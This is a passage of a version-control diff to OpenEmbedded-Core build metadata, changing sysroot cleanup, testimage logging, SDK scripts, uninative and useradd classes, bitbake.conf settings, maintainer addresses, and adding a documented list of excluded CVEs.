271 recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE") 275 recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE")
272 276
@@ -408,7 +412,7 @@ python extend_recipe_sysroot() {
408 if os.path.islink(f) and not os.path.exists(f): 412 if os.path.islink(f) and not os.path.exists(f):
409 bb.note("%s no longer exists, removing from sysroot" % f) 413 bb.note("%s no longer exists, removing from sysroot" % f)
410 lnk = os.readlink(f.replace(".complete", "")) 414 lnk = os.readlink(f.replace(".complete", ""))
411 sstate_clean_manifest(depdir + "/" + lnk, d, workdir) 415 sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
412 os.unlink(f) 416 os.unlink(f)
413 os.unlink(f.replace(".complete", "")) 417 os.unlink(f.replace(".complete", ""))
414 418
@@ -453,7 +457,7 @@ python extend_recipe_sysroot() {
453 fl = depdir + "/" + l 457 fl = depdir + "/" + l
454 bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l)) 458 bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l))
455 lnk = os.readlink(fl) 459 lnk = os.readlink(fl)
456 sstate_clean_manifest(depdir + "/" + lnk, d, workdir) 460 sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
457 os.unlink(fl) 461 os.unlink(fl)
458 os.unlink(fl + ".complete") 462 os.unlink(fl + ".complete")
459 463
@@ -474,7 +478,7 @@ python extend_recipe_sysroot() {
474 continue 478 continue
475 else: 479 else:
476 bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash)) 480 bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash))
477 sstate_clean_manifest(depdir + "/" + lnk, d, workdir) 481 sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
478 os.unlink(depdir + "/" + c) 482 os.unlink(depdir + "/" + c)
479 if os.path.lexists(depdir + "/" + c + ".complete"): 483 if os.path.lexists(depdir + "/" + c + ".complete"):
480 os.unlink(depdir + "/" + c + ".complete") 484 os.unlink(depdir + "/" + c + ".complete")
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index c709384b91..7c8b2b30a1 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -99,30 +99,9 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
99TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR" 99TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR"
100 100
101testimage_dump_target () { 101testimage_dump_target () {
102 top -bn1
103 ps
104 free
105 df
106 # The next command will export the default gateway IP
107 export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
108 ping -c3 $DEFAULT_GATEWAY
109 dmesg
110 netstat -an
111 ip address
112 # Next command will dump logs from /var/log/
113 find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
114} 102}
115 103
116testimage_dump_host () { 104testimage_dump_host () {
117 top -bn1
118 iostat -x -z -N -d -p ALL 20 2
119 ps -ef
120 free
121 df
122 memstat
123 dmesg
124 ip -s link
125 netstat -an
126} 105}
127 106
128python do_testimage() { 107python do_testimage() {
@@ -193,6 +172,7 @@ def testimage_main(d):
193 import json 172 import json
194 import signal 173 import signal
195 import logging 174 import logging
175 import shutil
196 176
197 from bb.utils import export_proxies 177 from bb.utils import export_proxies
198 from oeqa.core.utils.misc import updateTestData 178 from oeqa.core.utils.misc import updateTestData
@@ -228,9 +208,10 @@ def testimage_main(d):
228 208
229 tdname = "%s.testdata.json" % image_name 209 tdname = "%s.testdata.json" % image_name
230 try: 210 try:
231 td = json.load(open(tdname, "r")) 211 with open(tdname, "r") as f:
232 except (FileNotFoundError) as err: 212 td = json.load(f)
233 bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname) 213 except FileNotFoundError as err:
214 bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
234 215
235 # Some variables need to be updates (mostly paths) with the 216 # Some variables need to be updates (mostly paths) with the
236 # ones of the current environment because some tests require them. 217 # ones of the current environment because some tests require them.
@@ -397,10 +378,17 @@ def testimage_main(d):
397 get_testimage_result_id(configuration), 378 get_testimage_result_id(configuration),
398 dump_streams=d.getVar('TESTREPORT_FULLLOGS')) 379 dump_streams=d.getVar('TESTREPORT_FULLLOGS'))
399 results.logSummary(pn) 380 results.logSummary(pn)
381
382 # Copy additional logs to tmp/log/oeqa so it's easier to find them
383 targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN"))
384 os.makedirs(targetdir, exist_ok=True)
385 os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog)))
386 os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME'))))
387
400 if not results or not complete: 388 if not results or not complete:
401 bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True) 389 bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
402 if not results.wasSuccessful(): 390 if not results.wasSuccessful():
403 bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True) 391 bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
404 392
405def get_runtime_paths(d): 393def get_runtime_paths(d):
406 """ 394 """
diff --git a/meta/classes/toolchain-scripts.bbclass b/meta/classes/toolchain-scripts.bbclass
index db1d3215ef..21762b803b 100644
--- a/meta/classes/toolchain-scripts.bbclass
+++ b/meta/classes/toolchain-scripts.bbclass
@@ -29,7 +29,7 @@ toolchain_create_sdk_env_script () {
29 echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script 29 echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script
30 echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script 30 echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script
31 echo '# Only disable this check if you are absolutely know what you are doing!' >> $script 31 echo '# Only disable this check if you are absolutely know what you are doing!' >> $script
32 echo 'if [ ! -z "$LD_LIBRARY_PATH" ]; then' >> $script 32 echo 'if [ ! -z "${LD_LIBRARY_PATH:-}" ]; then' >> $script
33 echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script 33 echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script
34 echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script 34 echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script
35 echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script 35 echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script
@@ -44,7 +44,7 @@ toolchain_create_sdk_env_script () {
44 for i in ${CANADIANEXTRAOS}; do 44 for i in ${CANADIANEXTRAOS}; do
45 EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i" 45 EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i"
46 done 46 done
47 echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':$PATH' >> $script 47 echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':"$PATH"' >> $script
48 echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script 48 echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script
49 echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script 49 echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script
50 echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script 50 echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97..4d4f53ad4d 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
2UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}" 2UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
3 3
4UNINATIVE_URL ?= "unset" 4UNINATIVE_URL ?= "unset"
5UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz" 5UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
6# Example checksums 6# Example checksums
7#UNINATIVE_CHECKSUM[aarch64] = "dead" 7#UNINATIVE_CHECKSUM[aarch64] = "dead"
8#UNINATIVE_CHECKSUM[i686] = "dead" 8#UNINATIVE_CHECKSUM[i686] = "dead"
@@ -34,6 +34,8 @@ python uninative_event_fetchloader() {
34 with open(loaderchksum, "r") as f: 34 with open(loaderchksum, "r") as f:
35 readchksum = f.read().strip() 35 readchksum = f.read().strip()
36 if readchksum == chksum: 36 if readchksum == chksum:
37 if "uninative" not in d.getVar("SSTATEPOSTUNPACKFUNCS"):
38 enable_uninative(d)
37 return 39 return
38 40
39 import subprocess 41 import subprocess
@@ -100,7 +102,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
100 ${UNINATIVE_LOADER} \ 102 ${UNINATIVE_LOADER} \
101 ${UNINATIVE_LOADER} \ 103 ${UNINATIVE_LOADER} \
102 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \ 104 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
103 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum) 105 ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
104 subprocess.check_output(cmd, shell=True) 106 subprocess.check_output(cmd, shell=True)
105 107
106 with open(loaderchksum, "w") as f: 108 with open(loaderchksum, "w") as f:
@@ -167,5 +169,7 @@ python uninative_changeinterp () {
167 if not elf.isDynamic(): 169 if not elf.isDynamic():
168 continue 170 continue
169 171
172 os.chmod(f, s[stat.ST_MODE] | stat.S_IWUSR)
170 subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT) 173 subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT)
174 os.chmod(f, s[stat.ST_MODE])
171} 175}
diff --git a/meta/classes/useradd-staticids.bbclass b/meta/classes/useradd-staticids.bbclass
index 3a1b5f1320..908b24969f 100644
--- a/meta/classes/useradd-staticids.bbclass
+++ b/meta/classes/useradd-staticids.bbclass
@@ -41,7 +41,7 @@ def update_useradd_static_config(d):
41 def handle_missing_id(id, type, pkg, files, var, value): 41 def handle_missing_id(id, type, pkg, files, var, value):
42 # For backwards compatibility we accept "1" in addition to "error" 42 # For backwards compatibility we accept "1" in addition to "error"
43 error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC') 43 error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC')
44 msg = "%s - %s: %sname %s does not have a static ID defined." % (d.getVar('PN'), pkg, type, id) 44 msg = 'Recipe %s, package %s: %sname "%s" does not have a static ID defined.' % (d.getVar('PN'), pkg, type, id)
45 if files: 45 if files:
46 msg += " Add %s to one of these files: %s" % (id, files) 46 msg += " Add %s to one of these files: %s" % (id, files)
47 else: 47 else:
diff --git a/meta/classes/useradd.bbclass b/meta/classes/useradd.bbclass
index e5f3ba24f9..0f0ed3446d 100644
--- a/meta/classes/useradd.bbclass
+++ b/meta/classes/useradd.bbclass
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () {
230 preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd') 230 preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd')
231 preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems') 231 preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems')
232 preinst += d.getVar('useradd_preinst') 232 preinst += d.getVar('useradd_preinst')
233 # Expand out the *_PARAM variables to the package specific versions
234 for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]:
235 val = d.getVar(rep + "_" + pkg) or ""
236 preinst = preinst.replace("${" + rep + "}", val)
233 d.setVar('pkg_preinst_%s' % pkg, preinst) 237 d.setVar('pkg_preinst_%s' % pkg, preinst)
234 238
235 # RDEPENDS setup 239 # RDEPENDS setup
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index cd3d05709e..99f68f7505 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -233,7 +233,7 @@ create_cmdline_wrapper () {
233#!/bin/bash 233#!/bin/bash
234realpath=\`readlink -fn \$0\` 234realpath=\`readlink -fn \$0\`
235realdir=\`dirname \$realpath\` 235realdir=\`dirname \$realpath\`
236exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@" 236exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
237END 237END
238 chmod +x $cmd 238 chmod +x $cmd
239} 239}
diff --git a/meta/conf/abi_version.conf b/meta/conf/abi_version.conf
index 251d43bb21..35faef9a36 100644
--- a/meta/conf/abi_version.conf
+++ b/meta/conf/abi_version.conf
@@ -12,4 +12,4 @@ OELAYOUT_ABI = "14"
12# a reset of the equivalence, for example when reproducibility issues break the 12# a reset of the equivalence, for example when reproducibility issues break the
13# existing match data. Distros can also append to this value for the same effect. 13# existing match data. Distros can also append to this value for the same effect.
14# 14#
15HASHEQUIV_HASH_VERSION = "4" 15HASHEQUIV_HASH_VERSION = "5"
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index 6ada0099eb..457b7790c2 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -421,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
421 421
422SDK_NAME_PREFIX ?= "oecore" 422SDK_NAME_PREFIX ?= "oecore"
423SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}" 423SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
424SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}" 424SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
425SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}" 425SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
426# The path to default to installing the SDK to
427SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
426 428
427################################################################## 429##################################################################
428# Kernel info. 430# Kernel info.
@@ -480,7 +482,7 @@ export PATH
480# Build utility info. 482# Build utility info.
481################################################################## 483##################################################################
482 484
483# Directory where host tools are copied 485# Directory with symlinks to host tools used by build
484HOSTTOOLS_DIR = "${TMPDIR}/hosttools" 486HOSTTOOLS_DIR = "${TMPDIR}/hosttools"
485 487
486# Tools needed to run builds with OE-Core 488# Tools needed to run builds with OE-Core
@@ -500,7 +502,7 @@ HOSTTOOLS += " \
500HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}" 502HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}"
501 503
502# Link to these if present 504# Link to these if present
503HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo" 505HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo"
504 506
505# Temporary add few more detected in bitbake world 507# Temporary add few more detected in bitbake world
506HOSTTOOLS_NONFATAL += "join nl size yes zcat" 508HOSTTOOLS_NONFATAL += "join nl size yes zcat"
@@ -639,7 +641,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
639DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool" 641DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
640GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles" 642GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
641GNOME_GIT = "git://gitlab.gnome.org/GNOME" 643GNOME_GIT = "git://gitlab.gnome.org/GNOME"
642GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources" 644GNOME_MIRROR = "https://download.gnome.org/sources/"
643GNU_MIRROR = "https://ftp.gnu.org/gnu" 645GNU_MIRROR = "https://ftp.gnu.org/gnu"
644GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt" 646GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
645GPE_MIRROR = "http://gpe.linuxtogo.org/download/source" 647GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
@@ -687,7 +689,10 @@ SRC_URI = ""
687PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/" 689PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/"
688PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}" 690PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}"
689PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native" 691PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native"
690PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR},${WORKDIR}/pkgdata-sysroot,${TMPDIR}/sstate-control,${DEPLOY_DIR},${WORKDIR}/deploy-,${TMPDIR}/buildstats,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/sstate-build-image_complete,${TMPDIR}/sysroots-components,${BUILDHISTORY_DIR},${TMPDIR}/pkgdata,${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}" 692PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR}"
693PSEUDO_IGNORE_PATHS .= ",${TMPDIR}/sstate-control,${TMPDIR}/buildstats,${TMPDIR}/sysroots-components,${TMPDIR}/pkgdata"
694PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/deploy-,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/pkgdata-sysroot"
695PSEUDO_IGNORE_PATHS .= ",${DEPLOY_DIR},${BUILDHISTORY_DIR},${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}"
691 696
692export PSEUDO_DISABLED = "1" 697export PSEUDO_DISABLED = "1"
693#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}" 698#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}"
@@ -892,7 +897,7 @@ BB_HASHCONFIG_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} DATE TIME SSH_AGENT_PID \
892 PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \ 897 PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \
893 GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \ 898 GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \
894 HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \ 899 HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \
895 BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT" 900 BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT BB_NICE_LEVEL"
896BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \ 901BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \
897 lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \ 902 lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \
898 file-checksums python func task export unexport noexec nostamp dirs cleandirs \ 903 file-checksums python func task export unexport noexec nostamp dirs cleandirs \
diff --git a/meta/conf/distro/include/cve-extra-exclusions.inc b/meta/conf/distro/include/cve-extra-exclusions.inc
new file mode 100644
index 0000000000..f3490db9dd
--- /dev/null
+++ b/meta/conf/distro/include/cve-extra-exclusions.inc
@@ -0,0 +1,75 @@
1# This file contains a list of CVE's where resolution has proven to be impractical
2# or there is no reasonable action the Yocto Project can take to resolve the issue.
3# It contains all the information we are aware of about an issue and analysis about
4# why we believe it can't be fixed/handled. Additional information is welcome through
5# patches to the file.
6#
7# Include this file in your local.conf or distro.conf to exclude these CVE's
8# from the cve-check results or add to the bitbake command with:
9# -R conf/distro/include/cve-extra-exclusions.inc
10#
11# The file is not included by default since users should review this data to ensure
12# it matches their expectations and usage of the project.
13#
14# We may also include "in-flight" information about current/ongoing CVE work with
15# the aim of sharing that work and ensuring we don't duplicate it.
16#
17
18
19# strace https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0006
20# CVE is more than 20 years old with no resolution evident
21# broken links in CVE database references make resolution impractical
22CVE_CHECK_WHITELIST += "CVE-2000-0006"
23
24# epiphany https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0238
25# The issue here is spoofing of domain names using characters from other character sets.
26# There has been much discussion amongst the epiphany and webkit developers and
27# whilst there are improvements about how domains are handled and displayed to the user
28# there is unlikely ever to be a single fix to webkit or epiphany which addresses this
29# problem. Whitelisted as there isn't any mitigation or fix or way to progress this further
30# we can seem to take.
31CVE_CHECK_WHITELIST += "CVE-2005-0238"
32
33# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4756
34# Issue is memory exhaustion via glob() calls, e.g. from within an ftp server
35# Best discussion in https://bugzilla.redhat.com/show_bug.cgi?id=681681
36# Upstream don't see it as a security issue, ftp servers shouldn't be passing
37# this to libc glob. Exclude as upstream have no plans to add BSD's GLOB_LIMIT or similar
38CVE_CHECK_WHITELIST += "CVE-2010-4756"
39
40# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29509
41# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29511
42# The encoding/xml package in go can potentially be used for security exploits if not used correctly
43# CVE applies to a netapp product as well as flagging a general issue. We don't ship anything
44# exposing this interface in an exploitable way
45CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511"
46
47# db
48# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with
49# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed.
50CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \
51CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \
52CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \
53CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \
54CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981"
55
56# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20255
57# There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html
58# qemu maintainers say the patch is incorrect and should not be applied
59# Ignore from OE's perspectivee as the issue is of low impact, at worst sitting in an infinite loop rather than exploitable
60CVE_CHECK_WHITELIST += "CVE-2021-20255"
61
62# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12067
63# There was a proposed patch but rejected by upstream qemu. It is unclear if the issue can
64# still be reproduced or where exactly any bug is.
65# Ignore from OE's perspective as we'll pick up any fix when upstream accepts one.
66CVE_CHECK_WHITELIST += "CVE-2019-12067"
67
68# nasm:nasm-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18974
69# It is a fuzzing related buffer overflow. It is of low impact since most devices
70# wouldn't expose an assembler. The upstream is inactive and there is little to be
71# done about the bug, ignore from an OE perspective.
72CVE_CHECK_WHITELIST += "CVE-2020-18974"
73
74
75
diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651..038acc1504 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
47# The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully 47# The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully
48# fetch from the network (and warn you if not). To disable the test set 48# fetch from the network (and warn you if not). To disable the test set
49# the variable to be empty. 49# the variable to be empty.
50# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master 50# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
51CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/" 51CONNECTIVITY_CHECK_URIS ?= "https://yoctoproject.org/connectivity.html"
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index ff962a3be9..11a35a2c59 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
4# 4#
5# Please submit any patches against recipes in meta to the 5# Please submit any patches against recipes in meta to the
6# OE-Core mail list (openembedded-core@lists.openembedded.org) 6# OE-Core mail list (openembedded-core@lists.openembedded.org)
7# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org) 7# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
8# 8#
9# If you have problems with or questions about a particular recipe, feel 9# If you have problems with or questions about a particular recipe, feel
10# free to contact the maintainer directly (cc:ing the appropriate mailing list 10# free to contact the maintainer directly (cc:ing the appropriate mailing list
@@ -88,8 +88,8 @@ RECIPE_MAINTAINER_pn-builder = "Richard Purdie <richard.purdie@linuxfoundation.o
88RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>" 88RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
89RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>" 89RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
90RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>" 90RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>"
91RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@ti.com>" 91RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@denix.org>"
92RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@ti.com>" 92RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@denix.org>"
93RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>" 93RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>"
94RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>" 94RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>"
